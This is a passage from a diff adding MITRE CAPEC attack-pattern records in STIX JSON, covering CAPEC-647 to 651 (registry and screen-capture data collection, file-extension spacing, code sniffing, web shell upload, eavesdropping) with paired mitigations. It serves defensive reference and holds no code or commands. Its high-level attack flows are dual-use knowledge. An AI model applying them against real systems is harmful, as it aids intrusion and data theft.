+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d9f6ac50-d71a-415a-a9f3-6b159c887206", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2404315-1d87-4e47-a8e4-c6b2cfe457d8", + "spec_version": "2.1", + "target_ref": "attack-pattern--658d6220-f15c-44fb-8690-1d14088ed637", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in authorization to gather system-specific data and sensitive information within a registry (e.g., Windows Registry, Mac plist). These contain information about the system configuration, software, operating system, and security. 
The adversary can leverage information gathered in order to carry out further attacks.", + "external_references": [ + { + "external_id": "CAPEC-647", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/647.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "description": "Data from Local System", + "external_id": "T1005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1005" + }, + { + "description": "Query Registry", + "external_id": "T1012", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1012" + }, + { + "description": "Unsecured Credentials: Credentials in Registry", + "external_id": "T1552.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/002" + } + ], + "id": "attack-pattern--ad242ccf-3578-4787-937c-22eb0ede3fb6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Collect Data from Registries", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (The adversary is able to read sensitive information about the system in the registry.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Gain logical access to system: An adversary must first gain logical access to the system it wants to gather registry information from,

  2. Techniques
    Obtain user account credentials and access the system
    Plant malware on the system that will give remote logical access to the adversary

Experiment

  1. Determine if the permissions are correct: Once logical access is gained, an adversary will determine if they have the proper permissions, or are authorized, to view registry information. If they do not, they will need to escalate privileges on the system through other means

  2. Peruse registry for information: Once an adversary has access to a registry, they will gather all system-specific data and sensitive information that they deem useful.

Exploit

  1. Follow-up attack: Use any information or weaknesses found to carry out a follow-up attack

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system).", + "The adversary must have capability to navigate the operating system to peruse the registry." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Once the adversary has logical access (which can potentially require high knowledge and skill level), the adversary needs only the capability and facility to navigate the system through the OS graphical user interface or the command line." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--46c95866-35f0-4eb3-8236-3cf76d28c354", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9c745fa6-97fd-4aa7-830c-2522e1df5ea6", + "spec_version": "2.1", + "target_ref": "attack-pattern--ad242ccf-3578-4787-937c-22eb0ede3fb6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ robust identification and audit/blocking via using an allowlist of applications on your system. 
Unnecessary applications, utilities, and configurations will have a presence in the system registry that can be leveraged by an adversary through this attack pattern.", + "id": "course-of-action--b20b8831-79c4-401b-9767-4c506d59c2d9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-647-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--df86fcb3-a484-4707-a8c7-d61b784214bb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b20b8831-79c4-401b-9767-4c506d59c2d9", + "spec_version": "2.1", + "target_ref": "attack-pattern--ad242ccf-3578-4787-937c-22eb0ede3fb6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary gathers sensitive information by exploiting the system's screen capture functionality. Through screenshots, the adversary aims to see what happens on the screen over the course of an operation. 
The adversary can leverage information gathered in order to carry out further attacks.", + "external_references": [ + { + "external_id": "CAPEC-648", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/648.html" + }, + { + "external_id": "CWE-267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html" + }, + { + "description": "Screen Capture", + "external_id": "T1113", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1113" + }, + { + "description": "Screen Capture", + "external_id": "T1513", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1513" + } + ], + "id": "attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Collect Data from Screen Capture", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (The adversary is able to capture potentially sensitive information and processes as they appear on the screen.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system)." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Once the adversary has logical access (which can potentially require high knowledge and skill level), the adversary needs only to leverage the relevant command for screen capture." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify potentially malicious software that may have functionality to acquire screen captures, and audit and/or block it by using allowlist tools.", + "id": "course-of-action--c4331607-533f-4210-910b-2ce3a63f070a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-648-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6e4ee62c-e443-4037-aa6a-3ddddcf93324", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c4331607-533f-4210-910b-2ce3a63f070a", + "spec_version": "2.1", + "target_ref": "attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "While screen capture is a legitimate and practical function, certain situations and context may require the disabling of this feature.", + "id": "course-of-action--ec0a0b82-9297-4d4b-8a03-975dc1cdd2e7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-648-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--e559a56f-da83-4f00-bf13-dda7f216f4e3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ec0a0b82-9297-4d4b-8a03-975dc1cdd2e7", + "spec_version": "2.1", + "target_ref": "attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary adds a space character to the end of a file extension and takes advantage of an application that does not properly neutralize trailing special elements in file names. This extra space, which can be difficult for a user to notice, affects which default application is used to operate on the file and can be leveraged by the adversary to control execution.", + "external_references": [ + { + "external_id": "CAPEC-649", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/649.html" + }, + { + "external_id": "CWE-46", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/46.html" + }, + { + "description": "Masquerading:Space after Filename", + "external_id": "T1036.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/006" + } + ], + "id": "attack-pattern--f18ec51a-9ecd-49bf-9b91-5f5288306f70", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Adding a Space to a File Extension", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--95afb65f-ece7-4511-85a3-d7bfb9973022" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Execute Unauthorized Commands" + ], + 
"Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The use of the file must be controlled by the file extension." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "File extensions should be checked to see if non-visible characters are being included.", + "id": "course-of-action--ca9bac26-36eb-4576-996b-53f3e979c3ed", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-649-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06d27c54-f604-4253-9b67-9e78cfe16886", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ca9bac26-36eb-4576-996b-53f3e979c3ed", + "spec_version": "2.1", + "target_ref": "attack-pattern--f18ec51a-9ecd-49bf-9b91-5f5288306f70", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary passively sniffs network communications and captures application code bound for an authorized client. Once obtained, they can use it as-is, or through reverse-engineering glean sensitive information or exploit the trust relationship between the client and server. 
Such code may belong to a dynamic update to the client, a patch being applied to a client component or any such interaction where the client is authorized to communicate with the server.", + "external_references": [ + { + "external_id": "CAPEC-65", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/65.html" + }, + { + "external_id": "CWE-319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/319.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "external_id": "CWE-318", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/318.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "Network Sniffing", + "external_id": "T1040", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1040" + } + ], + "id": "attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Sniff Application Code", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--55ce63d0-6143-4b95-b70c-87c5b60aafa8" + ], + "x_capec_child_of_refs": [ + "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "Attacker receives notification that the computer/OS/application has an available update, loads a network sniffing tool, and extracts update data from subsequent communication. 
The attacker then proceeds to reverse engineer the captured stream to gain sensitive information, such as encryption keys, validation algorithms, applications patches, etc..", + "Plain code, such as applets or JavaScript, is also part of the executing application. If such code is transmitted unprotected, the attacker can capture the code and possibly reverse engineer it to gain sensitive information, such as encryption keys, validation algorithms and such." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Set up a sniffer: The adversary sets up a sniffer in the path between the server and the client and watches the traffic.

  2. Techniques
    The adversary sets up a sniffer in the path between the server and the client.

Exploit

  1. [Capturing Application Code Bound During Patching]adversary knows that the computer/OS/application can request new applications to install, or it periodically checks for an available update. The adversary loads the sniffer set up during Explore phase, and extracts the application code from subsequent communication. The adversary then proceeds to reverse engineer the captured code.

  2. Techniques
    adversary loads the sniffer to capture the application code bound during a dynamic update.
    The adversary proceeds to reverse engineer the captured code.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The attacker must have the ability to place themself in the communication path between the client and server.", + "The targeted application must receive some application code from the server; for example, dynamic updates, patches, applets or scripts.", + "The attacker must be able to employ a sniffer on the network without being detected." + ], + "x_capec_resources_required": [ + "\n The Attacker needs the ability to capture communications between the client being updated and the server providing the update.\n In the case that encryption obscures client/server communication the attacker will either need to lift key material from the client.\n " + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to setup a sniffer for a sufficient period of time so as to capture meaningful quantities of code. The presence of the sniffer should not be detected on the network. Also if the attacker plans to employ an adversary-in-the-middle attack (CAPEC-94), the client or server must not realize this. Finally, the attacker needs to regenerate source code from binary code if the need be." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Encrypt all communication between the client and server.", + "id": "course-of-action--c929e01c-c2b8-495f-bac3-4e6b80ae2d7b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-65-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f11fbd0b-3fdd-4f8c-b521-a759509f3c72", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c929e01c-c2b8-495f-bac3-4e6b80ae2d7b", + "spec_version": "2.1", + "target_ref": "attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use SSL, SSH, SCP.", + "id": "course-of-action--dd68f1a2-41e9-4d58-8759-18724265ed85", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-65-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f45fd050-a931-464c-985d-2ee73ad18461", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"relationship_type": "mitigates", + "source_ref": "course-of-action--dd68f1a2-41e9-4d58-8759-18724265ed85", + "spec_version": "2.1", + "target_ref": "attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Operation: Use \"ifconfig/ipconfig\" or other tools to detect the sniffer installed in the network.", + "id": "course-of-action--f3d9104c-7744-4b8d-a0ad-eda7ccd58f13", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-65-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--817eac3b-7a9b-49f3-853d-f4f1190b3d05", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f3d9104c-7744-4b8d-a0ad-eda7ccd58f13", + "spec_version": "2.1", + "target_ref": "attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "By exploiting insufficient permissions, it is possible to upload a web shell to a web server in such a way that it can be executed remotely. This shell can have various capabilities, thereby acting as a \"gateway\" to the underlying web server. 
The shell might execute at the higher permission level of the web server, providing the ability the execute malicious code at elevated levels.", + "external_references": [ + { + "external_id": "CAPEC-650", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/650.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-553", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/553.html" + }, + { + "description": "Server Software Component:Web Shell", + "external_id": "T1505.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1505/003" + } + ], + "id": "attack-pattern--b9cddd44-a617-4a56-8560-0ca1cd9af42a", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Upload a Web Shell to a Web Server", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The web server is susceptible to one of the various web application exploits that allows for uploading a shell file." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure your web server is up-to-date with all patches to protect against known vulnerabilities.", + "id": "course-of-action--0bda0539-7bb3-4094-8f97-c0e908214b20", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-650-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--94978147-aaca-4748-8abc-5609dc8c0133", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0bda0539-7bb3-4094-8f97-c0e908214b20", + "spec_version": "2.1", + "target_ref": "attack-pattern--b9cddd44-a617-4a56-8560-0ca1cd9af42a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that the file permissions in directories on the web server from which files can be execute is set to the \"least privilege\" settings, and that those directories contents is controlled by an allowlist.", + "id": "course-of-action--3787e994-06dd-4cd3-a066-e53bd6493039", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-650-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + 
"id": "relationship--34439947-c6ff-46d0-a607-e7439be9d509", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3787e994-06dd-4cd3-a066-e53bd6493039", + "spec_version": "2.1", + "target_ref": "attack-pattern--b9cddd44-a617-4a56-8560-0ca1cd9af42a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary intercepts a form of communication (e.g. text, audio, video) by way of software (e.g., microphone and audio recording application), hardware (e.g., recording equipment), or physical means (e.g., physical proximity). The goal of eavesdropping is typically to gain unauthorized access to sensitive information about the target for financial, personal, political, or other gains. Eavesdropping is different from a sniffing attack as it does not take place on a network-based communication channel (e.g., IP traffic). 
Instead, it entails listening in on the raw audio source of a conversation between two or more parties.", + "external_references": [ + { + "external_id": "CAPEC-651", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/651.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Multi-Factor Authentication Interception", + "external_id": "T1111", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1111" + } + ], + "id": "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Eavesdropping", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--bdc2219a-ebe0-4372-90b8-841dd7bd4c8e" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (The adversary gains unauthorized access to information.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software", + "Physical Security" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--a4986dd8-cb9c-45cb-bb53-b7549f2b8d62", + "attack-pattern--a7ed6b37-4ede-4c34-bbb2-c422fb844d74", + "attack-pattern--28cce7ad-5437-4fae-86b0-a21ab3a0e135" + ], + "x_capec_prerequisites": [ + "The adversary typically requires physical proximity to the target's environment, whether for physical eavesdropping or for placing recording equipment. This is not always the case for software-based eavesdropping, if the adversary has the capability to install malware on the target system that can activate a microphone and record audio digitally." + ], + "x_capec_resources_required": [ + "For logical eavesdropping, some equipment may be necessary (e.g., microphone, tape recorder, etc.). For physical eavesdropping, only proximity is required." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Be mindful of your surroundings when discussing sensitive information in public areas.", + "id": "course-of-action--80199435-cd0f-4050-b9c4-faae49a620cd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-651-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1641c1d2-3516-4cc2-9d1f-2358c9d3f117", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--80199435-cd0f-4050-b9c4-faae49a620cd", + "spec_version": "2.1", + "target_ref": "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement proper software restriction policies to only allow authorized software on your environment. Use of anti-virus and other security monitoring and detecting tools can aid in this too. 
Closely monitor installed software for unusual behavior or activity, and implement patches as soon as they become available.", + "id": "course-of-action--99574627-4dd1-42b3-8b6b-775ff7f38e6a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-651-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cba47b13-b50e-4cb8-8e76-8a25e15c68cc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--99574627-4dd1-42b3-8b6b-775ff7f38e6a", + "spec_version": "2.1", + "target_ref": "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If possible, physically disable the microphone on your machine if it is not needed.", + "id": "course-of-action--69dcf49f-4e67-4936-8ee7-6328a342fcf3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-651-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9fead0ee-041f-4282-bc32-392a7b3aed13", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--69dcf49f-4e67-4936-8ee7-6328a342fcf3", + "spec_version": "2.1", + 
